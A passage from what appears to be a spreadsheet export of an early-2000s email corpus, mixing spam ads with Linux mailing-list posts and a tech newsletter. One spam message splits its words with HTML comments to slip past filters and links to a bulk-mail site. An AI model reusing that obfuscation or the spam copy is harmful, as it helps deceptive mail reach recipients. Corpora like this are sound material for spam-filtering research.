   &lt;TR&gt;
     &lt;TD vAlign=top width=565 height=318&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE style="WIDTH: 555px" height=341 cellSpacing=0 cellPadding=0 
       width="60%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" height=366&gt;
             &lt;DIV align=center&gt;
             &lt;TABLE borderColor=#000000 height=5 cellSpacing=0 cellPadding=5 
             width=554 bgColor=#ffffff border=1&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width=540 height=1&gt;&lt;FONT color=#ff0000&gt;
                   &lt;TABLE height=61 width="100%" border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD width="30%" height=55&gt;
                         &lt;P align=center&gt;&lt;IMG height=100 
                         src="http://7x24.sunshinehui.com/mnbv/csi.gif" width=133 
                         border=0&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/FONT&gt;
                       &lt;TD vAlign=top width="70%" height=55&gt;
                         &lt;P align=center&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;&lt;FONT 
                         size=4&gt;Get a beautiful, 100% Custom Web Site (&lt;EM&gt;or 
                         yours redesigned&lt;/EM&gt;)&amp;nbsp;&lt;I&gt;for only 
                         $389&lt;/I&gt;!*&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
                         color=#ff0000&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial 
                         color=#ff0000 size=3&gt;We have references coast to 
                         coast&amp;nbsp;&lt;BR&gt;and will give you &lt;I&gt;plenty of sites to 
                         view!&lt;/I&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial size=3&gt;&lt;STRONG&gt;Includes up to 
                   7 pages (you can add more), java rollover buttons, feedback 
                   forms, more. It will be constructed to your taste and 
                   specifications. We do not use templates,&amp;nbsp; &lt;EM&gt;our sites 
                   are completely custom.&amp;nbsp;&lt;/EM&gt;&lt;FONT 
                   color=#ff0000&gt;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;*&lt;I&gt;Must host with us @ 
                   $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                   Page, Graphical Statistics, 
                   more).&lt;BR&gt;&lt;/I&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 
                   size=4&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=Arial size=3&gt; 
                   &lt;/FONT&gt;&lt;I&gt;&lt;FONT face=Arial color=#ff0000 size=3&gt;For sites to 
                   view, complete below or call our message center at 
                   321-726-2209 (24 hours). Your call will be returned 
                   promptly.&lt;/FONT&gt;&lt;/I&gt;&lt;FONT face=Arial color=#000080 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#ff0000 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial size=2&gt;&lt;B&gt;&lt;FONT 
                   color=#0000ff&gt;&lt;I&gt;NOTE:&amp;nbsp;&amp;nbsp; If you are using a web 
                   based email program (such as Yahoo, Hotmail, etc.) the form 
                   below will not work.&lt;/I&gt;&amp;nbsp;&lt;/FONT&gt; Instead of using the 
                   form,&lt;FONT color=#000080&gt;&amp;nbsp;&lt;/FONT&gt;&lt;A 
                   href="mailto:jcarter988@excite.com?subject=More info, I HAVE INCLUDED MY NAME, PHONE and STATE!18na0826399)"&gt;&lt;FONT 
                   color=#000080&gt; &lt;/FONT&gt;&lt;I&gt;&lt;FONT color=#0000ff&gt;CLICK 
                   HERE&lt;/FONT&gt;&lt;/I&gt;&lt;/A&gt;&lt;FONT color=#ff0000&gt; &lt;/FONT&gt;&lt;FONT 
                   color=#0000ff&gt;.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;FORM 
                   action="mailto:jcarter988@excite.com?subject=WS Sales Inquiry18na08262399" 
                   method=post encType=text/plain &lt;FORM&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial color=#000080 
                   size=1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;FONT face=Arial 
                   color=#000000 size=1&gt;Name:&lt;INPUT size=26 name=Name&gt; Phone 
                   w/AC*:&lt;INPUT size=16 name=Phone&gt;State:&lt;INPUT size=6 
                   name=State&gt; &lt;BR&gt;Type Project:&lt;I&gt;&lt;INPUT type=radio value=New 
                   name=Project&gt;&lt;/I&gt; &lt;I&gt;New Site:&lt;INPUT type=radio value=Redesign 
                   name=Project&gt;Redesign &lt;INPUT type=radio value=Flash 
                   name=Project&gt;Flash Intro/banner&lt;/I&gt;&amp;nbsp;&amp;nbsp; Current 
                   site?:&lt;INPUT name=Currentsite&gt;&lt;BR&gt;Comments:&lt;/FONT&gt;&lt;FONT 
                   face=Arial color=#000080 size=1&gt;&lt;INPUT size=66 
                   name=Comments&gt;&amp;nbsp;&amp;nbsp;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT size=2&gt;&lt;INPUT type=submit value=Submit name=B1&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FORM&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
             &lt;CENTER&gt;
             &lt;DIV align=left&gt;&lt;FONT face=Arial size=2&gt;&lt;BR&gt;If you do not wish to 
             receive our messages,&lt;/FONT&gt;&lt;FONT face=Arial&gt; &lt;FONT size=3&gt;&lt;B&gt;&lt;I&gt;&lt;A 
             href="mailto:plmn77@excite.com?subject=No_more_mail_18na_0826399p3"&gt;CLICK 
             HERE&lt;/A&gt; &amp;nbsp; &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial size=2&gt;(Please enter 
             ALL email addresses (in the body of the message) you wish to have 
             eliminated from future 
         mailings.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 [3121jDvN9-@9]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Bukkake
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
 &gt;... its a word that deserves a place in the daily vernacular,
 &gt;much like squick, schmegma, and dork.
 &gt;
 Don't forget slithy, mimsy, gimble, and frumious, bequeathed to us by 
 Lewis Carol...
 Elias
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: mplayer not working for me
</t>
  </si>
  <si>
    <t xml:space="preserve">Laurent Papier wrote:
 &gt;On Tue, 8 Oct 2002 16:24:06 +0200
 &gt;Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 &gt;
 &gt;  
 &gt;
 &gt;&gt;Once upon a time, Roi wrote :
 &gt;&gt;
 &gt;&gt;    
 &gt;&gt;
 &gt;&gt;&gt;mplayer works with dga (if i am root) and works with x11
 &gt;&gt;&gt;and always worked with sdl (but not now with redhat 8)
 &gt;&gt;&gt;now it gives black screen window and play the music of the movie.
 &gt;&gt;&gt;      
 &gt;&gt;&gt;
 &gt;&gt;Strange, because as I said in an earlier post, it works for me. Maybe
 &gt;&gt;you're missing the SDL_image or something? :-/
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;It also works nicely for me.
 &gt;
 &gt;Laurent
 &gt;  
 &gt;
 [roi@roi roi]$ rpm -qa | grep -i sdl
 SDL_image-devel-1.2.2-3
 xmame-SDL-0.60.1-fr2
 SDL_mixer-1.2.4-5
 SDL-1.2.4-5
 SDL-devel-1.2.4-5
 SDL_mixer-devel-1.2.4-5
 SDL_net-1.2.4-3
 SDL_net-devel-1.2.4-3
 SDL_image-1.2.2-3
 Seems I got all packages I need.
 It worked on redhat 7.3 I did upgrade not reinstall so packages
 shouldn't make a problem.
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Ximian apt repos?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-07-22 at 06:50, che wrote:
 &gt; thats the correct lines to be added to sources.list for the repository
 &gt; i just did a apt-get install gnome-session its still progressing :)
 Excellent - might give it a bash tonight :)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: AmeriCorpsVISTA
</t>
  </si>
  <si>
    <t xml:space="preserve">The pay's not good (9,300 a year), but there is insurance, a 4,700 (I 
 think) off a student loan, or for future education, and non-compete status 
 for any govt. job after a year's service.  I moved to New Orleans 
 yesterday, and I should be flying to DC in about a month to start the 
 AmeriCorps training.  I'll be setting up a community technology center which 
 will be used to teach computer literacy skills to low income folks (just, 
 like, learning MS shit (yeah yeah, wtf am i doing?  I know.))  so that 
 they can possibly find better jobs.  I'm sure I'll be doing all sorts 
 of other things too, like helping folks with their taxes, writing grants, 
 etc.  The website is www.americorps.org.  There are -all- sorts of jobs 
 all over the country, so if someone out there can survive on the small 
 salary, it's something s/he might want to take a look at.  
 Since Xi is in college and getting grants + scholarship + child support 
 from dad, my load has gone down terrifically.  The IRS is after me for 
 money I didn't make on the stock market, so it's a way to at least get 
 into a situation where they will have to understand that yes, they will 
 have to wait.  
 But bottom line benefit and motivation is the feelgood that ya get when 
 you do this type of job.  I'm up for some of that.
 Cindy
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [gst-devel] Red Hat 8.0
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
 &gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
 &gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:
 &gt; &gt; &gt; &gt; 
 &gt; &gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
 &gt; &gt; 
 &gt; &gt; &gt; Are you using the same version of GCC to compile the plugin as its C++
 &gt; &gt; &gt; dependencies?
 &gt; &gt; 
 &gt; &gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't
 &gt; &gt; linking to a lib somewhere, I'm just not sure what lib it should
 &gt; &gt; preloading here.  Anyway to find out which one it is ?
 &gt; 
 &gt; Looks like a problem with the avifile you've rebuilt... I've been unable to
 &gt; recompile successfully the latest version on 8.0 :-/
 Hm, it is built inside the same chroot.  aviplay works (well it would if I 
 had XV, I get X errors ;)).  But it doesn't complain about linker 
 problems.  So I suppose my avifile library on itself is compiled ok.
 Sigh, avifile is one of the worst packages out there, in all aspects - 
 naming of tarballs, not ever releasing an actual package, versioning of 
 libraries, API stability, ...
 Thomas
  -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 cos when i needed someone
 you left me floored
 the feeling is gone
 i can't let go
 you know that i'd change if i had the love it takes
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: merchant info 3115107654333222221111
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 A&lt;!--mom and dad--&gt;ccept C&lt;!--grandma and grandpa--&gt;redit C&lt;!--aunt kate--&gt;ards - Everyone A&lt;!--uncle don--&gt;pproved&lt;p&gt;
 NO C&lt;!--hi family--&gt;REDIT CH&lt;!--i love you all--&gt;ECKS
 &lt;p&gt;
 &lt;a href=http://www.requestedinfo.net/cgi-bin/rbis.cgi?code=btbtbt&gt;DO IT NOW&lt;/a&gt;
 &lt;p&gt;
 &lt;/html&gt;
 3115107654333222221111
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Mirror a website
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the tips. The closest I've gotten to getting it working is
 Justins script except I can seem to prevent it from following links
 offsite.
 Typical, something that should only take a minute...
 Thanks for you help.
 ct
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] Exclude pages from site map
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to exclude a set of pages from the site map? For each
 page in the site I also create a "printer friendly" page, and I would
 like to exclude all of those form the sitemap.
 -- 
 -----------------------------------------------------------------------
 | Alan K. Jackson            | To see a World in a Grain of Sand      |
 | alan@ajackson.org          | And a Heaven in a Wild Flower,         |
 | www.ajackson.org           | Hold Infinity in the palm of your hand |
 | Houston, Texas             | And Eternity in an hour. - Blake       |
 -----------------------------------------------------------------------
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Digital Media]  Humblest Alarm
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020715.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020715.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020715 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt"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&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.15.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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To all you Dream Theater fans out there, please accept my humblest of apologies. 
 I mistakenly announced their break up in the last GnomeAudio section, causing 
 quite a stir among a number of subscribers. In fact, they just released a double 
 album this year and have been touring in support of that release. 
 For today's false alarm, please make note of the tragedy that is the N'SYNC 
 breakup (oh wait, that's just wishful thinking).
 &lt;p&gt;
 I know I've already carried on about my Kyocera 6035 phone, but this thing is 
 awesome.  I've got all my contacts in one device. Web browsing is good - I'm 
 sure it would be better on a color screen, like the 
 &lt;a href="http://www.handspring.com/products/treo270/index.jhtml?sub_nav_section=Overview&amp;prod_cat_name=Treo270"&gt;Treo 270&lt;/a&gt;, but for what I'll need, 
 this works well. I'm currently looking for an ssh client I can install, so that 
 remote server logins will be possible. My one complaint is the base station's 
 use of a serial connector instead of USB, but I suppose they were cutting costs. 
 &lt;p&gt;
 I'm also scoping out the 
 &lt;a href="http://www.peanutpress.com/S=ed9724e6e001d4f7afd09fc34b785c41PTNCLsCoAAIAAGD6Ee43335503/makebook/index.cgi/pml"&gt;Palm Markup Language&lt;/a&gt; 
 (PML) standard for marking up Palm Docs, 
 in an effort to make the GnomeTomes a little flashier. I've installed several of 
 the files on my phone and while they are easy to read, have all the content 
 organized, and function as useful tips for the various subjects, I'd like to add 
 some minor tweaks to future tomes, so that they look even better for me and 
 anyone else who reads them on their Palm.  
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;TomeRaider v2.0 [1673k] W98/W2K/Pocket PC/Palm $25&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.tomeraider.com/"&gt;http://www.tomeraider.com/&lt;/a&gt;&lt;p&gt;
 Of the formats Lockergnome uses for our GnomeTomes, TomeRaider is by far my 
 favorite. Designed with a feel similar to CHM, the TR format is quite easy 
 to read, as it places section titles in a pane separate from content, 
 allowing you, the reader, to navigate through our tips (or anything else) 
 with much greater ease than the linear format the other versions present. 
 The Windows version of the software is truly designed with ease of use in 
 mind. Creating ebooks for TomeRaider is a simple matter of combining a 
 modified set of HTML tags with the &lt;new&gt; designation for page breaks. The 
 only trick for Yankees like me is remembering that center is tagged centre 
 in the software.
 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;The Herd of Star Wars Nerds&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.ifilm.com/ifilm/product/film_info/0,3699,2439321,00.html?cch=11"&gt;http://www.ifilm.com/ifilm/product/film_info/0,3699,2439321,00.html?cch=11&lt;/a&gt;&lt;p&gt;
 Triumph the dog is low-tech, he's not cute like the pets.com sock puppet, 
 but he manages to maintain a twisted appeal to fans of lowbrow comedy. In 
 this segment, Triumph makes a mockery of geeks standing in line for 
 Episode II. Whether you've been one of those geeks yourself, or you've 
 never understood why anyone would dress up and wait in line for a movie, 
 you'll still find this film amusing. 10 minutes was more than necessary 
 to get the point across, yet Triumph delivers enough one-liners 
 throughout to keep you watching all the way to the end.
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Kids World for &lt;a title="DesktopX Website" target=_blank HREF="http://www.stardock.com/products/desktopx" &gt;DesktopX&lt;/a&gt;&lt;/b&gt; by Frogboy&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="/images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on 7/14/2002 12:35:00 AM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;&lt;center&gt;
 &lt;img BORDER=0 SRC="http://www.wincustomize.com/library/accounts/Frogboy/dx/tkids2002.jpg" ALT="Kids World by Frogboy"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Kids World" HREF="http://www.wincustomize.com/skins.asp?flags=skinid=1953|library=3|file=KidsWorld.dxtheme|p=lg" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.wincustomize.com/library/accounts/Frogboy/dx/kids2002.jpg" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit WinCustomize" target=_blank HREF="http://www.wincustomize.com/skins.asp?library=3&amp;SkinID=1953" &gt;Visit WinCustomize&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- AUDIO --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeAUDIO&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Heleen van den Hombergh&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.heleenvandenhombergh.com/"&gt;http://www.heleenvandenhombergh.com/&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://artists.mp3s.com/artists/378/heleen_van_den_hombergh.html"&gt;http://artists.mp3s.com/artists/378/heleen_van_den_hombergh.html&lt;/a&gt;&lt;p&gt;
 Classic jazz vocal styling, juxtaposing arrangements of contemporary 
 pieces with arrangements of jazz standards. Combined with some 
 beautiful piano arrangements, Heleen's voice is a thing of beauty. A 
 Netherlands native,  who originally dreamed of saving the rainforests 
 (at least according to her biography), her interpretation of American 
 jazz standards and show tunes is more remarkable than most native 
 English speaking vocalists. No world tour is currently scheduled, so 
 you'll probably have to journey to Europe to see her in person, but 
 for those of you living elsewhere in the world, the Internet makes a 
 fabulous venue for experiencing Heleen  van den Hombergh's talent. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;A BOOK FOR EVERY GEEK:&lt;/b&gt; Want to know more about 
 &lt;a href="http://www.gnometomes.com/tome/001826.html"&gt;networking&lt;/a&gt;? 
 Have you ever wanted to 
 &lt;a href="http://www.gnometomes.com/tome/001843.html"&gt;write an e-book&lt;/a&gt;? Maybe you need to polish 
 your 
 &lt;a href="http://www.gnometomes.com/tome/001829.html"&gt;Web design&lt;/a&gt; skills? Get full-length books from the Poor Richard's 
 series, including &lt;b&gt;Poor Richard's E-mail Publishing&lt;/b&gt;, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. 
 &lt;a href="http://www.gnometomes.com"&gt;Click here&lt;/a&gt; to learn more.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- PLUGIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePLUGIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Aezay Caption Draw v1.0 [71k] W9X/NT/W2K/XP FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.winamp.com/plugins/detail.jhtml?componentId=112660"&gt;http://www.winamp.com/plugins/detail.jhtml?componentId=112660&lt;/a&gt;&lt;p&gt;
 Reminding me of creating captions for Webcam32, this application uses 
 incomprehensible string values to display relevant info about Winamp 
 songs in the Windows caption bar. List song names, time of day, 
 playlist information, filenames, and a variety of other more obscure 
 information. Changing caption colors is also doable within this 
 plug-in. A set of hot keys makes controlling Winamp from your keyboard 
 more functional, although you can't remap any of the keys.
 &lt;!-- DVD --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDVD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="left" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a href="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=111007501"&gt;&lt;img alt="DVD" border="0" width="94" height="140" src="http://images.lockergnome.com/images/dvd/themanwhowasntthere.jpg"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font style="font-size: 7pt" size="1" color="red" face="Verdana, Tahoma, Arial"&gt;Click for Details&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;The Man Who Wasn't There&lt;/b&gt; (R) 2001&lt;br&gt;
 Drama - 116min&lt;br&gt;
 Reviewer's Tilt (9)&lt;p&gt;
 &lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;&lt;img border="0" src="http://images.lockergnome.com/images/dvdgnomefull.gif"&gt;
 &lt;p class="url"&gt;Special DVD Features worth a look-Thornton and Coen Brothers Commentary&lt;/p&gt;
 Much more film noir, than a movie trying to imitate film noir, The Man
 Who Wasn't There captures the inevitable hopelessness of the genre. Ed
 Crane (Billy Bob Thornton) is the archetype everyman. A barber by trade,
 Crane represents the individual in society. He hears everything, but
 truly knows nothing. Everything he hears is modified ever so slightly by
 the retelling. He gets neither the whole story nor the true motivations.
 Left to guess at the motivations and desires of those around him, Crane
 develops an indifference to it all. When a snake oil sales man slithers
 into town, Crane takes this opportunity to cheat the cheaters and punish
 the punishers.  As indifferent as Crane appears, he is no match for the
 amorality of fate. As much as fate is indifferent in its wrath, however,
 so is it artistic in its execution. That is what makes our lives so
 entertaining. Fate doles ultimate justice, but never as expected. The
 Man Who Wasn't There is truly a Kafkaesque tale of an individual's year
 to turn against the tide of inevitability. Atypical of cuter, more
 recent Coen brothers fare, this film is reminiscent of their earlier
 noir works like Blood Simple and Miller's Crossing. Frances McDormand
 does an outstanding job making as Crane's selfish wife and James
 Gandolfini exudes boorishness as Doris' boss. The real outstanding
 performances, however, rest with the supporting cast. Tony Shalhoub, as
 pompus attorney Freddy Riedenschneider and  Jon Polito as the snake oil
 salesman impress and entertain as cruel, but offbeat parodies of their
 characters. The black and white cinematography by Roger Deakins also
 impresses and precisely underscores the bleakness of Crane's life and
 the monochromatic nature of fate.
 &lt;ul&gt;
 &lt;li&gt;Region 1 Encoding (US and Canada only)
